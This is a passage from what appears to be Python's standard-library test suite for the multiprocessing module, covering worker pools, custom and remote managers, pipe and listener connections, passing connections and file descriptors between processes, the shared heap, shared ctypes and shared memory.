self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
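# By default register() exposes only public methods, so Foo proxies get f()
# and g() but not _h(); Bar explicitly exposes ('f', '_h'); baz() returns a
# generator wrapped in IteratorProxy so iteration goes through remote
# __next__ calls.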
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
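# QueueManager registers get_queue with a server-side callable, while
# QueueManager2 registers only the name and relies on the server's
# implementation; both sides must agree on the 'xmlrpclib' serializer.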
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
        # Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
        # pickle, this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
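# SENTINEL is an empty message; the _echo() child echoes each received byte
# string back and exits its loop when it receives SENTINEL, closing its end of
# the connection.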
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
        # would sometimes fail on older versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
    @classmethod
    def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
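        # Binding a second Listener to an address that is already in use must
        # raise OSError for every supported address family.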
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle. This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
        # 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
        # Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
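        # For each family: create a Listener, report its address to the
        # parent, then send the accepted Connection object itself back over
        # `conn`, exercising pickling of connections.  Finally repeat the
        # same steps with a plain listening socket.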
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
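        # Receive (address, message) pairs until a None sentinel arrives,
        # connect to each address and reply with the upper-cased message;
        # the final pair is handled with a plain socket instead of a
        # Connection.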
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
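        # Below, a write-only end and then a read-only end are sent to the
        # child, which only uses each one for the direction it supports.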
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
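        # A zero threshold makes the heap discard an arena as soon as it is
        # entirely free, so the final assertions can check that no arenas
        # remain once every block has been freed.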
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
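        # The child doubles every shared value in place; because the memory
        # is shared, the parent observes the doubled values after join().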
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
        # Creating a shared memory segment with a negative size must fail.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
        # Test that the shared memory segment is created properly when
        # _make_filename returns the name of an existing shared memory segment.
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
